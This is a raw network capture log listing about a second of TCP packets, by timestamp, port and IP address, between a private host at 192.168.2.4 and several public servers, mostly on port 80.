Jan 14, 2022 00:16:08.871288061 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871304035 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871342897 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871362925 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871381998 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871402025 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871418953 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871459007 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871498108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871514082 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871539116 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871578932 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871592999 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871608973 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871644974 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871648073 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871685982 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871706009 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871725082 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871766090 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871779919 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871805906 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871845007 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871867895 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871884108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871921062 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871959925 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871979952 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871997118 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872046947 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872061968 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.872087002 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872117996 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.872123957 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872163057 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872203112 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.872216940 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.876137972 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.907016039 CET	49908	38133	192.168.2.4	86.107.197.138
Jan 14, 2022 00:16:08.911343098 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911401033 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911441088 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911482096 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911513090 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911521912 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911560059 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911593914 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911600113 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911612034 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911639929 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911679029 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911703110 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911722898 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911761045 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911782980 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911799908 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911839008 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911875010 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911894083 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911914110 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911951065 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.911983013 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.911989927 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.912003040 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.912041903 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.912072897 CET	80	49907	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.912131071 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.912287951 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.912307978 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.912484884 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.924005032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.930160999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.934379101 CET	38133	49908	86.107.197.138	192.168.2.4
Jan 14, 2022 00:16:08.934549093 CET	49908	38133	192.168.2.4	86.107.197.138
Jan 14, 2022 00:16:08.938829899 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.938870907 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.938910007 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.938949108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.938986063 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.938986063 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.939017057 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.939027071 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.939069033 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.939106941 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.939109087 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.939301968 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.940804958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.940918922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941016912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941114902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941212893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941306114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941399097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941495895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941591978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941684008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941780090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941900015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.941919088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942017078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942121029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942214966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942311049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942405939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942501068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942517042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942611933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942708969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942806959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942898989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.942992926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943087101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943178892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943274975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943371058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943386078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943468094 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943501949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943506956 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943547964 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943588018 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943619013 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943624020 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943664074 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943665028 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943703890 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943742990 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943763971 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943780899 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943787098 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943820953 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943861008 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943882942 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943900108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943933010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943936110 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.943942070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.943969011 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.943975925 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944014072 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944046974 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944051981 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944091082 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944122076 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944128990 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944168091 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944202900 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944206953 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944245100 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944283009 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944313049 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944320917 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944323063 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944360018 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944400072 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944418907 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944438934 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944479942 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944499969 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944519043 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944521904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.944531918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.944556952 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944587946 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944596052 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944636106 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944673061 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944703102 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944710970 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944742918 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944747925 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944780111 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.944809914 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944955111 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.944957018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.944964886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.945156097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.945164919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.945745945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.945760965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.945918083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946014881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946115017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946219921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946352959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946371078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946536064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946554899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946732044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946826935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.946923018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947020054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947114944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947208881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947226048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947331905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947429895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947535992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947637081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947732925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947828054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947845936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.947942019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948045969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948132992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948230982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948324919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948419094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948513985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948642969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948661089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948770046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948863983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.948956966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949055910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949151993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949244976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949263096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949357986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949450970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949548960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949656010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949753046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949832916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949969053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.949985981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950067997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950150013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950324059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950340986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950421095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950504065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950587988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950675011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950845003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950860977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.950941086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.951105118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.951118946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.951200008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.951297998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.951509953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.955571890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.964396000 CET	80	49907	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.964432001 CET	80	49907	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.977329016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.986824989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.987082005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.987334967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.987467051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.987723112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988049030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988138914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988586903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988696098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988816023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.988966942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989125013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989281893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989298105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989465952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989485025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989644051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989659071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989790916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989820004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.989902020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990076065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990093946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990256071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990269899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990442991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990461111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990633965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990648985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990808010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990825891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990982056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.990997076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991158009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991175890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991341114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991357088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991456985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991554976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991647959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991744995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991837025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991854906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.991951942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992059946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992158890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992254019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992350101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992444038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992538929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992625952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992722988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992738008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992830038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.992917061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993015051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993117094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993208885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993304014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993398905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993494987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993590117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993608952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993710995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993805885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993963957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.993980885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994081020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994169950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994257927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994493008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994775057 CET	80	49907	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.994776964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.994812012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.995049000 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.995068073 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.995170116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.995784998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.995980978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.996931076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997179031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997195959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997370005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997384071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997495890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997642994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997661114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997828960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.997847080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998034954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998049974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998235941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998253107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998704910 CET	49902	80	192.168.2.4	185.215.113.35
